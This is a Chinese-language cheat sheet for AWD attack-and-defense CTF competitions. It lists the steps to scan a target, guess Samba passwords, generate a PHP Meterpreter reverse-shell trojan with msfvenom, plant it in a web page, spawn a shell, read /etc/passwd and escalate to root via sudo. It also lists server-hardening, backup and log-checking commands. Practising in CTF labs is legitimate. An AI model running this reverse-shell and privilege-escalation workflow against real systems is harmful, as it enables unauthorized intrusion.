AWD
扫描对方IP:
ifconfig (先获取自己的IP)
netdiscover -r 192.168.0.1/24 (扫描1~124的IP)
获取IP后:
nmap -sV 192.168.0.104 (端口扫描)
nmap -A -v -T4 192.168.0.104 (TCP 端口扫描)
端口:
22: ssh
21: ftp
23: telnet
80: http
433:https
3306: mysql
若有Samba服务开起:
smbclinet -L 192.168.0.104 (查看目录)
smbclinet ‘\\192.168.0.104\print$‘ (进入目录print$)
(一个一个的试)(弱密码猜测)
若进入后:
get a.txt (可以获取a.txt文件)
mysql -h 192.168.0.104 -u Admin -p (连接数据库)
(输入密码) (密码可能藏在某个文件)
searchsploit Samba smbd 3.x - 4.x (搜索)
dirb http://192.168.0.104 (扫描web)
进入网站
登录Admin
使用msf来设置payload
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options (查看)
set lhost (ip)
set lport (ip)
run (监听)
msfvenom -p php/meterpreter/reverse_tcp lhost=(ip) lport=(ip) -f raw
(生成php shell 木马)
将木马复制粘贴到某一个php页面,然后想方设法触发漏洞,通过访问该php,即可触发漏洞
触发成功后:
msf里shell
提权:
id (查看当前的用户uid)
python -c "import pty;pty.spawn(‘/bin/bash‘)"
cat /etc/passwd (获取用户)
su (用户) (有密码自己找)
sudo -l 提权
sudo su
进入查找flag,一般在 /root/proot.txt
cat proot.txt
提交flag!
ssh操作
ssh <-p 端口> 用户名@IP //登录
scp 文件路径 用户名@IP:存放路径 //向ssh服务器上传输文件
备份web目录
tar -zcvf web.tar.gz /var/www/html/
用户管理
w //查看当前用户
pkill -kill -t <用户tty> //踢掉当前登录用户
进程管理
ps aux | grep pid或者进程名 //查看进程信息
查看已建立的网络连接及进程
netstat -antulp | grep EST
查看指定端口被哪个进程占用
lsof -i:端口号 或者 netstat -tunlp|grep 端口号
结束进程命令
kill PID
killall <进程名>
kill -9 <PID>
iptables命令
封杀某个IP或者ip段,如:123.4.5.6
iptables -I INPUT -s 123.4.5.6 -j DROP
iptables -I INPUT -s 123.4.5.1/24 -j DROP
禁止从某个主机ssh远程访问登陆到本机,如123.4.5.6
iptable -t filter -A INPUT -s 123.4.5.6 -p tcp --dport 22 -j DROP
Mysql数据库操作
备份mysql数据库
mysqldump -u 用户名 -p 密码 数据库名 > back.sql //备份指定数据库
mysqldump --all-databases > bak.sql //备份所有数据库
还原mysql数据库
mysql -u 用户名 -p 密码 数据库名 < bak.sql
安全检查
find / *.php -perm 4777 //查找777的权限的php文件
awk -F: ‘{if($3==0)print $1}‘ /etc/passwd //查看root权限的账号
crontab -l //查看计划任务
检测所有的tcp连接数量及状态
netstat -ant|awk ‘{print $5 "\t" $6}‘ |grep "[1-9][0-9]*\."|sed -e ‘s/::ffff://‘ -e ‘s/:[0-9]*//‘|sort|uniq -c|sort -rn
查看页面访问排名前十的IP
cat /var/log/apache2/access.log | cut -f1 -d " " | sort | uniq -c | sort -k 1 -r | head -10
查看页面访问排名前十的URL
cat /var/log/apache2/access.log | cut -f4 -d " " | sort | uniq -c | sort -k 1 -r | head -10
搜寻网站简要信息
curl --head 网站
xprobe2 -v 网站
nmap []
-A显示详细版本信息
-v显示详细信息
-o显示对方操作系统
matego
Web漏洞发现(http扫描)
webshag
w3af---(强大专业工具)
owasp ZAP等同于w3af WEB扫描工具
注入工具
Sqlmap
setoolkit(*****很牛工具)